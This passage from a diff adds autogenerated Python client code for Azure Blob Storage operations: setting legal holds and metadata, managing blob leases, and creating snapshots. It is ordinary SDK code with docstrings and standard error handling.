+            error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response)
+            raise HttpResponseError(response=response, model=error)
+
+        response_headers = {}
+        response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id'))
+        response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id'))
+        response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version'))
+        response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date'))
+
+
+        if cls:
+            return cls(pipeline_response, None, response_headers)
+
+    delete_immutability_policy.metadata = {'url': "{url}/{containerName}/{blob}"}  # type: ignore
+
+
+    @distributed_trace
+    def set_legal_hold(  # pylint: disable=inconsistent-return-statements
+        self,
+        legal_hold,  # type: bool
+        timeout=None,  # type: Optional[int]
+        request_id_parameter=None,  # type: Optional[str]
+        **kwargs  # type: Any
+    ):
+        # type: (...) -> None
+        """The Set Legal Hold operation sets a legal hold on the blob.
+
+        :param legal_hold: Specified if a legal hold should be set on the blob.
+        :type legal_hold: bool
+        :param timeout: The timeout parameter is expressed in seconds. For more information, see
+         :code:`Setting Timeouts for Blob Service Operations.`. Default value is None.
+        :type timeout: int
+        :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB
+         character limit that is recorded in the analytics logs when storage analytics logging is
+         enabled. Default value is None.
+        :type request_id_parameter: str
+        :keyword comp: comp. Default value is "legalhold". Note that overriding this default value
+         may result in unsupported behavior.
+        :paramtype comp: str
+        :keyword callable cls: A custom type or function that will be passed the direct response
+        :return: None, or the result of cls(response)
+        :rtype: None
+        :raises: ~azure.core.exceptions.HttpResponseError
+        """
+        cls = kwargs.pop('cls', None)  # type: ClsType[None]
+        error_map = {
+            401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
+        }
+        error_map.update(kwargs.pop('error_map', {}))
+
+        comp = kwargs.pop('comp', "legalhold")  # type: str
+
+
+        request = build_set_legal_hold_request(
+            url=self._config.url,
+            comp=comp,
+            version=self._config.version,
+            legal_hold=legal_hold,
+            timeout=timeout,
+            request_id_parameter=request_id_parameter,
+            template_url=self.set_legal_hold.metadata['url'],
+        )
+        request = _convert_request(request)
+        request.url = self._client.format_url(request.url)
+
+        pipeline_response = self._client._pipeline.run(  # pylint: disable=protected-access
+            request,
+            stream=False,
+            **kwargs
+        )
+        response = pipeline_response.http_response
+
+        if response.status_code not in [200]:
+            map_error(status_code=response.status_code, response=response, error_map=error_map)
+            error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response)
+            raise HttpResponseError(response=response, model=error)
+
+        response_headers = {}
+        response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id'))
+        response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id'))
+        response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version'))
+        response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date'))
+        response_headers['x-ms-legal-hold']=self._deserialize('bool', response.headers.get('x-ms-legal-hold'))
+
+
+        if cls:
+            return cls(pipeline_response, None, response_headers)
+
+    set_legal_hold.metadata = {'url': "{url}/{containerName}/{blob}"}  # type: ignore
+
+
+    @distributed_trace
+    def set_metadata(  # pylint: disable=inconsistent-return-statements
+        self,
+        timeout=None,  # type: Optional[int]
+        metadata=None,  # type: Optional[Dict[str, str]]
+        request_id_parameter=None,  # type: Optional[str]
+        lease_access_conditions=None,  # type: Optional["_models.LeaseAccessConditions"]
+        cpk_info=None,  # type: Optional["_models.CpkInfo"]
+        cpk_scope_info=None,  # type: Optional["_models.CpkScopeInfo"]
+        modified_access_conditions=None,  # type: Optional["_models.ModifiedAccessConditions"]
+        **kwargs  # type: Any
+    ):
+        # type: (...) -> None
+        """The Set Blob Metadata operation sets user-defined metadata for the specified blob as one
+        or more name-value pairs.
+
+        :param timeout: The timeout parameter is expressed in seconds. For more information, see
+         :code:`Setting Timeouts for Blob Service Operations.`. Default value is None.
+        :type timeout: int
+        :param metadata: Optional. Specifies a user-defined name-value pair associated with the
+         blob. If no name-value pairs are specified, the operation will copy the metadata from the
+         source blob or file to the destination blob. If one or more name-value pairs are
+         specified, the destination blob is created with the specified metadata, and metadata is
+         not copied from the source blob or file. Note that beginning with version 2009-09-19,
+         metadata names must adhere to the naming rules for C# identifiers. See Naming and
+         Referencing Containers, Blobs, and Metadata for more information. Default value is None.
+ :type metadata: dict[str, str] + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :param lease_access_conditions: Parameter group. Default value is None. + :type lease_access_conditions: ~azure.storage.blob.models.LeaseAccessConditions + :param cpk_info: Parameter group. Default value is None. + :type cpk_info: ~azure.storage.blob.models.CpkInfo + :param cpk_scope_info: Parameter group. Default value is None. + :type cpk_scope_info: ~azure.storage.blob.models.CpkScopeInfo + :param modified_access_conditions: Parameter group. Default value is None. + :type modified_access_conditions: ~azure.storage.blob.models.ModifiedAccessConditions + :keyword comp: comp. Default value is "metadata". Note that overriding this default value may + result in unsupported behavior. + :paramtype comp: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: None, or the result of cls(response) + :rtype: None + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[None] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + comp = kwargs.pop('comp', "metadata") # type: str + + _lease_id = None + _encryption_key = None + _encryption_key_sha256 = None + _encryption_algorithm = None + _encryption_scope = None + _if_modified_since = None + _if_unmodified_since = None + _if_match = None + _if_none_match = None + _if_tags = None + if lease_access_conditions is not None: + _lease_id = lease_access_conditions.lease_id + if cpk_info is not None: + _encryption_key = cpk_info.encryption_key + _encryption_key_sha256 = cpk_info.encryption_key_sha256 + _encryption_algorithm = cpk_info.encryption_algorithm + if cpk_scope_info is not None: + _encryption_scope = cpk_scope_info.encryption_scope + if modified_access_conditions is not None: + _if_modified_since = modified_access_conditions.if_modified_since + _if_unmodified_since = modified_access_conditions.if_unmodified_since + _if_match = modified_access_conditions.if_match + _if_none_match = modified_access_conditions.if_none_match + _if_tags = modified_access_conditions.if_tags + + request = build_set_metadata_request( + url=self._config.url, + comp=comp, + version=self._config.version, + timeout=timeout, + metadata=metadata, + lease_id=_lease_id, + encryption_key=_encryption_key, + encryption_key_sha256=_encryption_key_sha256, + encryption_algorithm=_encryption_algorithm, + encryption_scope=_encryption_scope, + if_modified_since=_if_modified_since, + if_unmodified_since=_if_unmodified_since, + if_match=_if_match, + if_none_match=_if_none_match, + if_tags=_if_tags, + request_id_parameter=request_id_parameter, + template_url=self.set_metadata.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [200]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, 
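+ # failsafe_deserialize returns None instead of raising when the error body
+ # cannot be parsed as a StorageError document, so `model` may be None here.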
model=error) + + response_headers = {} + response_headers['ETag']=self._deserialize('str', response.headers.get('ETag')) + response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified')) + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['x-ms-version-id']=self._deserialize('str', response.headers.get('x-ms-version-id')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + response_headers['x-ms-request-server-encrypted']=self._deserialize('bool', response.headers.get('x-ms-request-server-encrypted')) + response_headers['x-ms-encryption-key-sha256']=self._deserialize('str', response.headers.get('x-ms-encryption-key-sha256')) + response_headers['x-ms-encryption-scope']=self._deserialize('str', response.headers.get('x-ms-encryption-scope')) + + + if cls: + return cls(pipeline_response, None, response_headers) + + set_metadata.metadata = {'url': "{url}/{containerName}/{blob}"} # type: ignore + + + @distributed_trace + def acquire_lease( # pylint: disable=inconsistent-return-statements + self, + timeout=None, # type: Optional[int] + duration=None, # type: Optional[int] + proposed_lease_id=None, # type: Optional[str] + request_id_parameter=None, # type: Optional[str] + modified_access_conditions=None, # type: Optional["_models.ModifiedAccessConditions"] + **kwargs # type: Any + ): + # type: (...) -> None + """[Update] The Lease Blob operation establishes and manages a lock on a blob for write and delete + operations. + + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param duration: Specifies the duration of the lease, in seconds, or negative one (-1) for a + lease that never expires. A non-infinite lease can be between 15 and 60 seconds. A lease + duration cannot be changed using renew or change. Default value is None. + :type duration: int + :param proposed_lease_id: Proposed lease ID, in a GUID string format. The Blob service returns + 400 (Invalid request) if the proposed lease ID is not in the correct format. See Guid + Constructor (String) for a list of valid GUID string formats. Default value is None. + :type proposed_lease_id: str + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :param modified_access_conditions: Parameter group. Default value is None. + :type modified_access_conditions: ~azure.storage.blob.models.ModifiedAccessConditions + :keyword comp: comp. Default value is "lease". Note that overriding this default value may + result in unsupported behavior. + :paramtype comp: str + :keyword action: Describes what lease action to take. Default value is "acquire". Note that + overriding this default value may result in unsupported behavior. 
+ :paramtype action: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: None, or the result of cls(response) + :rtype: None + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[None] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + comp = kwargs.pop('comp', "lease") # type: str + action = kwargs.pop('action', "acquire") # type: str + + _if_modified_since = None + _if_unmodified_since = None + _if_match = None + _if_none_match = None + _if_tags = None + if modified_access_conditions is not None: + _if_modified_since = modified_access_conditions.if_modified_since + _if_unmodified_since = modified_access_conditions.if_unmodified_since + _if_match = modified_access_conditions.if_match + _if_none_match = modified_access_conditions.if_none_match + _if_tags = modified_access_conditions.if_tags + + request = build_acquire_lease_request( + url=self._config.url, + comp=comp, + action=action, + version=self._config.version, + timeout=timeout, + duration=duration, + proposed_lease_id=proposed_lease_id, + if_modified_since=_if_modified_since, + if_unmodified_since=_if_unmodified_since, + if_match=_if_match, + if_none_match=_if_none_match, + if_tags=_if_tags, + request_id_parameter=request_id_parameter, + template_url=self.acquire_lease.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [201]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['ETag']=self._deserialize('str', response.headers.get('ETag')) + response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified')) + response_headers['x-ms-lease-id']=self._deserialize('str', response.headers.get('x-ms-lease-id')) + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + + + if cls: + return cls(pipeline_response, None, response_headers) + + acquire_lease.metadata = {'url': "{url}/{containerName}/{blob}"} # type: ignore + + + @distributed_trace + def release_lease( # pylint: disable=inconsistent-return-statements + self, + lease_id, # type: str + timeout=None, # type: Optional[int] + request_id_parameter=None, # type: Optional[str] + modified_access_conditions=None, # type: Optional["_models.ModifiedAccessConditions"] + **kwargs # type: Any + ): + # type: (...) -> None + """[Update] The Lease Blob operation establishes and manages a lock on a blob for write and delete + operations. + + :param lease_id: Specifies the current lease ID on the resource. + :type lease_id: str + :param timeout: The timeout parameter is expressed in seconds. 
For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :param modified_access_conditions: Parameter group. Default value is None. + :type modified_access_conditions: ~azure.storage.blob.models.ModifiedAccessConditions + :keyword comp: comp. Default value is "lease". Note that overriding this default value may + result in unsupported behavior. + :paramtype comp: str + :keyword action: Describes what lease action to take. Default value is "release". Note that + overriding this default value may result in unsupported behavior. + :paramtype action: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: None, or the result of cls(response) + :rtype: None + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[None] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + comp = kwargs.pop('comp', "lease") # type: str + action = kwargs.pop('action', "release") # type: str + + _if_modified_since = None + _if_unmodified_since = None + _if_match = None + _if_none_match = None + _if_tags = None + if modified_access_conditions is not None: + _if_modified_since = modified_access_conditions.if_modified_since + _if_unmodified_since = modified_access_conditions.if_unmodified_since + _if_match = modified_access_conditions.if_match + _if_none_match = modified_access_conditions.if_none_match + _if_tags = modified_access_conditions.if_tags + + request = build_release_lease_request( + url=self._config.url, + comp=comp, + action=action, + version=self._config.version, + lease_id=lease_id, + timeout=timeout, + if_modified_since=_if_modified_since, + if_unmodified_since=_if_unmodified_since, + if_match=_if_match, + if_none_match=_if_none_match, + if_tags=_if_tags, + request_id_parameter=request_id_parameter, + template_url=self.release_lease.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [200]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['ETag']=self._deserialize('str', response.headers.get('ETag')) + response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified')) + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + + + if cls: + return cls(pipeline_response, None, response_headers) + + release_lease.metadata = 
{'url': "{url}/{containerName}/{blob}"} # type: ignore + + + @distributed_trace + def renew_lease( # pylint: disable=inconsistent-return-statements + self, + lease_id, # type: str + timeout=None, # type: Optional[int] + request_id_parameter=None, # type: Optional[str] + modified_access_conditions=None, # type: Optional["_models.ModifiedAccessConditions"] + **kwargs # type: Any + ): + # type: (...) -> None + """[Update] The Lease Blob operation establishes and manages a lock on a blob for write and delete + operations. + + :param lease_id: Specifies the current lease ID on the resource. + :type lease_id: str + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :param modified_access_conditions: Parameter group. Default value is None. + :type modified_access_conditions: ~azure.storage.blob.models.ModifiedAccessConditions + :keyword comp: comp. Default value is "lease". Note that overriding this default value may + result in unsupported behavior. + :paramtype comp: str + :keyword action: Describes what lease action to take. Default value is "renew". Note that + overriding this default value may result in unsupported behavior. + :paramtype action: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: None, or the result of cls(response) + :rtype: None + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[None] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + comp = kwargs.pop('comp', "lease") # type: str + action = kwargs.pop('action', "renew") # type: str + + _if_modified_since = None + _if_unmodified_since = None + _if_match = None + _if_none_match = None + _if_tags = None + if modified_access_conditions is not None: + _if_modified_since = modified_access_conditions.if_modified_since + _if_unmodified_since = modified_access_conditions.if_unmodified_since + _if_match = modified_access_conditions.if_match + _if_none_match = modified_access_conditions.if_none_match + _if_tags = modified_access_conditions.if_tags + + request = build_renew_lease_request( + url=self._config.url, + comp=comp, + action=action, + version=self._config.version, + lease_id=lease_id, + timeout=timeout, + if_modified_since=_if_modified_since, + if_unmodified_since=_if_unmodified_since, + if_match=_if_match, + if_none_match=_if_none_match, + if_tags=_if_tags, + request_id_parameter=request_id_parameter, + template_url=self.renew_lease.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [200]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + 
response_headers['ETag']=self._deserialize('str', response.headers.get('ETag')) + response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified')) + response_headers['x-ms-lease-id']=self._deserialize('str', response.headers.get('x-ms-lease-id')) + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + + + if cls: + return cls(pipeline_response, None, response_headers) + + renew_lease.metadata = {'url': "{url}/{containerName}/{blob}"} # type: ignore + + + @distributed_trace + def change_lease( # pylint: disable=inconsistent-return-statements + self, + lease_id, # type: str + proposed_lease_id, # type: str + timeout=None, # type: Optional[int] + request_id_parameter=None, # type: Optional[str] + modified_access_conditions=None, # type: Optional["_models.ModifiedAccessConditions"] + **kwargs # type: Any + ): + # type: (...) -> None + """[Update] The Lease Blob operation establishes and manages a lock on a blob for write and delete + operations. + + :param lease_id: Specifies the current lease ID on the resource. + :type lease_id: str + :param proposed_lease_id: Proposed lease ID, in a GUID string format. The Blob service returns + 400 (Invalid request) if the proposed lease ID is not in the correct format. See Guid + Constructor (String) for a list of valid GUID string formats. + :type proposed_lease_id: str + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :param modified_access_conditions: Parameter group. Default value is None. + :type modified_access_conditions: ~azure.storage.blob.models.ModifiedAccessConditions + :keyword comp: comp. Default value is "lease". Note that overriding this default value may + result in unsupported behavior. + :paramtype comp: str + :keyword action: Describes what lease action to take. Default value is "change". Note that + overriding this default value may result in unsupported behavior. 
+ :paramtype action: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: None, or the result of cls(response) + :rtype: None + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[None] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + comp = kwargs.pop('comp', "lease") # type: str + action = kwargs.pop('action', "change") # type: str + + _if_modified_since = None + _if_unmodified_since = None + _if_match = None + _if_none_match = None + _if_tags = None + if modified_access_conditions is not None: + _if_modified_since = modified_access_conditions.if_modified_since + _if_unmodified_since = modified_access_conditions.if_unmodified_since + _if_match = modified_access_conditions.if_match + _if_none_match = modified_access_conditions.if_none_match + _if_tags = modified_access_conditions.if_tags + + request = build_change_lease_request( + url=self._config.url, + comp=comp, + action=action, + version=self._config.version, + lease_id=lease_id, + proposed_lease_id=proposed_lease_id, + timeout=timeout, + if_modified_since=_if_modified_since, + if_unmodified_since=_if_unmodified_since, + if_match=_if_match, + if_none_match=_if_none_match, + if_tags=_if_tags, + request_id_parameter=request_id_parameter, + template_url=self.change_lease.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [200]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['ETag']=self._deserialize('str', response.headers.get('ETag')) + response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified')) + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-lease-id']=self._deserialize('str', response.headers.get('x-ms-lease-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + + + if cls: + return cls(pipeline_response, None, response_headers) + + change_lease.metadata = {'url': "{url}/{containerName}/{blob}"} # type: ignore + + + @distributed_trace + def break_lease( # pylint: disable=inconsistent-return-statements + self, + timeout=None, # type: Optional[int] + break_period=None, # type: Optional[int] + request_id_parameter=None, # type: Optional[str] + modified_access_conditions=None, # type: Optional["_models.ModifiedAccessConditions"] + **kwargs # type: Any + ): + # type: (...) -> None + """[Update] The Lease Blob operation establishes and manages a lock on a blob for write and delete + operations. + + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. 
Default value is None. + :type timeout: int + :param break_period: For a break operation, proposed duration the lease should continue before + it is broken, in seconds, between 0 and 60. This break period is only used if it is shorter + than the time remaining on the lease. If longer, the time remaining on the lease is used. A new + lease will not be available before the break period has expired, but the lease may be held for + longer than the break period. If this header does not appear with a break operation, a + fixed-duration lease breaks after the remaining lease period elapses, and an infinite lease + breaks immediately. Default value is None. + :type break_period: int + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :param modified_access_conditions: Parameter group. Default value is None. + :type modified_access_conditions: ~azure.storage.blob.models.ModifiedAccessConditions + :keyword comp: comp. Default value is "lease". Note that overriding this default value may + result in unsupported behavior. + :paramtype comp: str + :keyword action: Describes what lease action to take. Default value is "break". Note that + overriding this default value may result in unsupported behavior. + :paramtype action: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: None, or the result of cls(response) + :rtype: None + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[None] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + comp = kwargs.pop('comp', "lease") # type: str + action = kwargs.pop('action', "break") # type: str + + _if_modified_since = None + _if_unmodified_since = None + _if_match = None + _if_none_match = None + _if_tags = None + if modified_access_conditions is not None: + _if_modified_since = modified_access_conditions.if_modified_since + _if_unmodified_since = modified_access_conditions.if_unmodified_since + _if_match = modified_access_conditions.if_match + _if_none_match = modified_access_conditions.if_none_match + _if_tags = modified_access_conditions.if_tags + + request = build_break_lease_request( + url=self._config.url, + comp=comp, + action=action, + version=self._config.version, + timeout=timeout, + break_period=break_period, + if_modified_since=_if_modified_since, + if_unmodified_since=_if_unmodified_since, + if_match=_if_match, + if_none_match=_if_none_match, + if_tags=_if_tags, + request_id_parameter=request_id_parameter, + template_url=self.break_lease.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [202]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['ETag']=self._deserialize('str', response.headers.get('ETag')) + 
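+ # x-ms-lease-time, read below, is the approximate number of seconds remaining
+ # until the break completes; 0 means the lease is already broken.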
response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified')) + response_headers['x-ms-lease-time']=self._deserialize('int', response.headers.get('x-ms-lease-time')) + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + + + if cls: + return cls(pipeline_response, None, response_headers) + + break_lease.metadata = {'url': "{url}/{containerName}/{blob}"} # type: ignore + + + @distributed_trace + def create_snapshot( # pylint: disable=inconsistent-return-statements + self, + timeout=None, # type: Optional[int] + metadata=None, # type: Optional[Dict[str, str]] + request_id_parameter=None, # type: Optional[str] + cpk_info=None, # type: Optional["_models.CpkInfo"] + cpk_scope_info=None, # type: Optional["_models.CpkScopeInfo"] + modified_access_conditions=None, # type: Optional["_models.ModifiedAccessConditions"] + lease_access_conditions=None, # type: Optional["_models.LeaseAccessConditions"] + **kwargs # type: Any + ): + # type: (...) -> None + """The Create Snapshot operation creates a read-only snapshot of a blob. + + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param metadata: Optional. Specifies a user-defined name-value pair associated with the blob. + If no name-value pairs are specified, the operation will copy the metadata from the source blob + or file to the destination blob. If one or more name-value pairs are specified, the destination + blob is created with the specified metadata, and metadata is not copied from the source blob or + file. Note that beginning with version 2009-09-19, metadata names must adhere to the naming + rules for C# identifiers. See Naming and Referencing Containers, Blobs, and Metadata for more + information. Default value is None. + :type metadata: dict[str, str] + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :param cpk_info: Parameter group. Default value is None. + :type cpk_info: ~azure.storage.blob.models.CpkInfo + :param cpk_scope_info: Parameter group. Default value is None. + :type cpk_scope_info: ~azure.storage.blob.models.CpkScopeInfo + :param modified_access_conditions: Parameter group. Default value is None. + :type modified_access_conditions: ~azure.storage.blob.models.ModifiedAccessConditions + :param lease_access_conditions: Parameter group. Default value is None. + :type lease_access_conditions: ~azure.storage.blob.models.LeaseAccessConditions + :keyword comp: comp. Default value is "snapshot". Note that overriding this default value may + result in unsupported behavior. 
+ :paramtype comp: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: None, or the result of cls(response) + :rtype: None + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[None] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + comp = kwargs.pop('comp', "snapshot") # type: str + + _encryption_key = None + _encryption_key_sha256 = None + _encryption_algorithm = None + _encryption_scope = None + _if_modified_since = None + _if_unmodified_since = None + _if_match = None + _if_none_match = None + _if_tags = None + _lease_id = None + if cpk_info is not None: + _encryption_key = cpk_info.encryption_key + _encryption_key_sha256 = cpk_info.encryption_key_sha256 + _encryption_algorithm = cpk_info.encryption_algorithm + if cpk_scope_info is not None: + _encryption_scope = cpk_scope_info.encryption_scope + if modified_access_conditions is not None: + _if_modified_since = modified_access_conditions.if_modified_since + _if_unmodified_since = modified_access_conditions.if_unmodified_since + _if_match = modified_access_conditions.if_match + _if_none_match = modified_access_conditions.if_none_match + _if_tags = modified_access_conditions.if_tags + if lease_access_conditions is not None: + _lease_id = lease_access_conditions.lease_id + + request = build_create_snapshot_request( + url=self._config.url, + comp=comp, + version=self._config.version, + timeout=timeout, + metadata=metadata, + encryption_key=_encryption_key, + encryption_key_sha256=_encryption_key_sha256, + encryption_algorithm=_encryption_algorithm, + encryption_scope=_encryption_scope, + if_modified_since=_if_modified_since, + if_unmodified_since=_if_unmodified_since, + if_match=_if_match, + if_none_match=_if_none_match, + if_tags=_if_tags, + lease_id=_lease_id, + request_id_parameter=request_id_parameter, + template_url=self.create_snapshot.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [201]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['x-ms-snapshot']=self._deserialize('str', response.headers.get('x-ms-snapshot')) + response_headers['ETag']=self._deserialize('str', response.headers.get('ETag')) + response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified')) + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + 